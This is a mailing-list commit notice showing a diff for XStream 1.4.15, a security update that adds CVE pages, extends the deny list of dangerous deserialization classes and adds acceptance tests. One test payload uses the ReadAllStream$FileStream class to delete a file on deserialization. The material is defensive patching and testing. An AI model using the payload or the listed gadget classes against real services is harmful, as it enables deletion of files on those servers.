<p>The core interface is <a href="javadoc/com/thoughtworks/xstream/security/TypePermission.html">TypePermission</a>.
The <a href="javadoc/com/thoughtworks/xstream/mapper/SecurityMapper.html">SecurityMapper</a> will evaluate a list
=====================================
xstream-distribution/src/content/website.xml
=====================================
@@ -1,6 +1,6 @@
<!--
Copyright (C) 2005, 2006 Joe Walnes.
- Copyright (C) 2006, 2007, 2010, 2011, 2014, 2015, 2016 XStream committers.
+ Copyright (C) 2006, 2007, 2010, 2011, 2014, 2015, 2016, 2017, 2020 XStream committers.
All rights reserved.
The software in this package is published under the terms of the BSD
@@ -45,6 +45,8 @@
</section>
<section>
<name>Vulnerabilities</name>
+ <page>CVE-2020-26259.html</page>
+ <page>CVE-2020-26258.html</page>
<page>CVE-2020-26217.html</page>
<page>CVE-2017-7957.html</page>
<page>CVE-2016-3674.html</page>
=====================================
xstream-hibernate/pom.xml
=====================================
@@ -13,7 +13,7 @@
<parent>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-parent</artifactId>
- <version>1.4.14</version>
+ <version>1.4.15</version>
</parent>
<artifactId>xstream-hibernate</artifactId>
<packaging>jar</packaging>
=====================================
xstream-jmh/pom.xml
=====================================
@@ -13,7 +13,7 @@
<parent>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-parent</artifactId>
- <version>1.4.14</version>
+ <version>1.4.15</version>
</parent>
<artifactId>xstream-jmh</artifactId>
<packaging>jar</packaging>
=====================================
xstream/pom.xml
=====================================
@@ -14,7 +14,7 @@
<parent>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-parent</artifactId>
- <version>1.4.14</version>
+ <version>1.4.15</version>
</parent>
<artifactId>xstream</artifactId>
<packaging>jar</packaging>
@@ -143,6 +143,54 @@
<artifactId>commons-lang</artifactId>
<scope>test</scope>
</dependency>
+
+ <dependency>
+ <groupId>com.sun.xml.ws</groupId>
+ <artifactId>jaxws-rt</artifactId>
+ <scope>test</scope>
+ <exclusions>
+ <exclusion>
+ <groupId>javax.xml.ws</groupId>
+ <artifactId>jaxws-api</artifactId>
+ </exclusion>
+ <exclusion>
+ <groupId>com.sun.istack</groupId>
+ <artifactId>istack-commons-runtime</artifactId>
+ </exclusion>
+ <exclusion>
+ <groupId>com.sun.xml.bind</groupId>
+ <artifactId>jaxb-impl</artifactId>
+ </exclusion>
+ <exclusion>
+ <groupId>com.sun.xml.messaging.saaj</groupId>
+ <artifactId>saaj-impl</artifactId>
+ </exclusion>
+ <exclusion>
+ <groupId>com.sun.xml.stream.buffer</groupId>
+ <artifactId>streambuffer</artifactId>
+ </exclusion>
+ <exclusion>
+ <groupId>com.sun.xml.ws</groupId>
+ <artifactId>policy</artifactId>
+ </exclusion>
+ <exclusion>
+ <groupId>com.sun.org.apache.xml.internal</groupId>
+ <artifactId>resolver</artifactId>
+ </exclusion>
+ <exclusion>
+ <groupId>org.glassfish.gmbal</groupId>
+ <artifactId>gmbal-api-only</artifactId>
+ </exclusion>
+ <exclusion>
+ <groupId>org.jvnet</groupId>
+ <artifactId>mimepull</artifactId>
+ </exclusion>
+ <exclusion>
+ <groupId>org.jvnet.staxex</groupId>
+ <artifactId>stax-ex</artifactId>
+ </exclusion>
+ </exclusions>
+ </dependency>
</dependencies>
<build>
=====================================
xstream/src/java/com/thoughtworks/xstream/XStream.java
=====================================
@@ -337,6 +337,7 @@ public class XStream {
private static final Pattern IGNORE_ALL = Pattern.compile(".*");
private static final Pattern LAZY_ITERATORS = Pattern.compile(".*\\$LazyIterator");
private static final Pattern JAVAX_CRYPTO = Pattern.compile("javax\\.crypto\\..*");
+ private static final Pattern JAXWS_FILE_STREAM = Pattern.compile(".*\\.ReadAllStream\\$FileStream");
/**
* Constructs a default XStream.
@@ -642,8 +643,12 @@ public class XStream {
}
addPermission(AnyTypePermission.ANY);
- denyTypes(new String[]{"java.beans.EventHandler", "java.lang.ProcessBuilder", "javax.imageio.ImageIO$ContainsFilter"});
- denyTypesByRegExp(new Pattern[]{LAZY_ITERATORS, JAVAX_CRYPTO});
+ denyTypes(new String[]{
+ "java.beans.EventHandler", //
+ "java.lang.ProcessBuilder", //
+ "javax.imageio.ImageIO$ContainsFilter", //
+ "jdk.nashorn.internal.objects.NativeString" });
+ denyTypesByRegExp(new Pattern[]{LAZY_ITERATORS, JAVAX_CRYPTO, JAXWS_FILE_STREAM});
allowTypeHierarchy(Exception.class);
securityInitialized = false;
}
=====================================
xstream/src/java/com/thoughtworks/xstream/io/xml/XmlFriendlyNameCoder.java
=====================================
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2006 Joe Walnes.
- * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2019 XStream Committers.
+ * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2019, 2020 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -279,7 +279,7 @@ public class XmlFriendlyNameCoder implements NameCoder, Cloneable {
final BitSet XML_NAME_CHARS_4TH = new BitSet(0xFFFFF);
XML_NAME_CHARS_4TH.set('-');
XML_NAME_CHARS_4TH.set('.');
- XML_NAME_CHARS_4TH.set('0', '9');
+ XML_NAME_CHARS_4TH.set('0', '9' + 1);
XML_NAME_CHARS_4TH.set(0xB7);
final BitSet XML_NAME_CHARS_5TH = (BitSet)XML_NAME_CHARS_4TH.clone();
@@ -406,8 +406,8 @@ public class XmlFriendlyNameCoder implements NameCoder, Cloneable {
XML_NAME_CHARS_4TH.set(0x30FC, 0x30FE + 1);
XML_NAME_CHARS_5TH.or(XML_NAME_START_CHARS_5TH);
- XML_NAME_CHARS_5TH.set(0x300, 0x36F);
- XML_NAME_CHARS_5TH.set(0x203F, 0x2040);
+ XML_NAME_CHARS_5TH.set(0x300, 0x36F + 1);
+ XML_NAME_CHARS_5TH.set(0x203F, 0x2040 + 1);
XML_NAME_START_CHARS = (BitSet)XML_NAME_START_CHARS_4TH.clone();
XML_NAME_START_CHARS.and(XML_NAME_START_CHARS_5TH);
@@ -493,9 +493,9 @@ public class XmlFriendlyNameCoder implements NameCoder, Cloneable {
// First, fast (common) case: nothing to escape
int i = 0;
- for (; i < length; i++ ) {
- char c = name.charAt(i);
- if (c == '$' || c == '_' || c <= 27 || c >= 127) {
+ for (; i < length; i++) {
+ final char c = name.charAt(i);
+ if (c < 'A' || (c > 'Z' && c < 'a') || c > 'Z') {
break;
}
}
=====================================
xstream/src/java/com/thoughtworks/xstream/mapper/DefaultMapper.java
=====================================
@@ -1,6 +1,6 @@
/*
* Copyright (C) 2005, 2006 Joe Walnes.
- * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2015, 2016 XStream Committers.
+ * Copyright (C) 2006, 2007, 2008, 2009, 2011, 2013, 2015, 2016, 2020 XStream Committers.
* All rights reserved.
*
* The software in this package is published under the terms of the BSD
@@ -77,7 +77,9 @@ public class DefaultMapper implements Mapper {
initialize = elementName.charAt(0) == '[';
}
return Class.forName(elementName, initialize, classLoader);
- } catch (ClassNotFoundException e) {
+ } catch (final ClassNotFoundException e) {
+ throw new CannotResolveClassException(elementName);
+ } catch (final IllegalArgumentException e) {
throw new CannotResolveClassException(elementName);
}
}
=====================================
xstream/src/test/com/thoughtworks/acceptance/SecurityVulnerabilityTest.java
=====================================
@@ -11,6 +11,11 @@
package com.thoughtworks.acceptance;
import java.beans.EventHandler;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
import java.util.Iterator;
import com.thoughtworks.xstream.XStream;
@@ -213,4 +218,68 @@ public class SecurityVulnerabilityTest extends AbstractAcceptanceTest {
// OK
}
}
+
+ public void testCannotUseJaxwsInputStreamToDeleteFile() {
+ if (JVM.isVersion(5)) {
+ final String xml = ""
+ + "<is class='com.sun.xml.ws.util.ReadAllStream$FileStream'>\n"
+ + " <tempFile>target/junit/test.txt</tempFile>\n"
+ + "</is>";
+
+ xstream.aliasType("is", InputStream.class);
+ try {
+ xstream.fromXML(xml);
+ fail("Thrown " + ConversionException.class.getName() + " expected");
+ } catch (final ForbiddenClassException e) {
+ // OK
+ }
+ }
+ }
+
+ public void testExplicitlyUseJaxwsInputStreamToDeleteFile() throws IOException {
+ if (JVM.isVersion(5)) {
+ final File testDir = new File("target/junit");
+ final File testFile = new File(testDir, "test.txt");
+ try {
+ testDir.mkdirs();
+
+ final OutputStream out = new FileOutputStream(testFile);
+ out.write("JUnit".getBytes());
+ out.flush();
+ out.close();
+
+ assertTrue("Test file " + testFile.getPath() + " does not exist.", testFile.exists());
+
+ final String xml = ""
+ + "<is class='com.sun.xml.ws.util.ReadAllStream$FileStream'>\n"
+ + " <tempFile>target/junit/test.txt</tempFile>\n"
+ + "</is>";
+
+ xstream.addPermission(AnyTypePermission.ANY); // clear out defaults
+ xstream.aliasType("is", InputStream.class);
+
+ InputStream is = null;
+ try {
+ is = (InputStream)xstream.fromXML(xml);
+ } catch (final ForbiddenClassException e) {
+ // OK
+ }
+
+ assertTrue("Test file " + testFile.getPath() + " no longer exists.", testFile.exists());
+
+ byte[] data = new byte[10];
+ is.read(data);
+ is.close();
+
+ assertFalse("Test file " + testFile.getPath() + " still exists exist.", testFile.exists());
+ } finally {
+ if (testFile.exists()) {
+ testFile.delete();
+ }
+ if (testDir.exists()) {
+ testDir.delete();
+ }
+ }
+ }
+ }
}
=====================================
xstream/src/test/com/thoughtworks/acceptance/XmlFriendlyTest.java
=====================================
@@ -187,6 +187,11 @@ public class XmlFriendlyTest extends AbstractAcceptanceTest {
assertBothWays("\"", "<string>"</string>");
}
+ public void testsDigitsOnly() {
+ xstream.alias("0123456789", String.class);
+ assertBothWays("", "<_.0030123456789></_.0030123456789>");
+ }
+
public void testDecimalFormatSymbols() {
final String xml;
if (!JVM.is14()) {
View it on GitLab: https://salsa.debian.org/java-team/libxstream-java/-/commit/aaea7658d3df10918725a84cfd251b53ea9e0943
--
View it on GitLab: https://salsa.debian.org/java-team/libxstream-java/-/commit/aaea7658d3df10918725a84cfd251b53ea9e0943
You're receiving this email because of your account on salsa.debian.org.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://alioth-lists.debian.net/pipermail/pkg-java-commits/attachments/20201218/bd71fc67/attachment.html>
More information about the pkg-java-commits
mailing list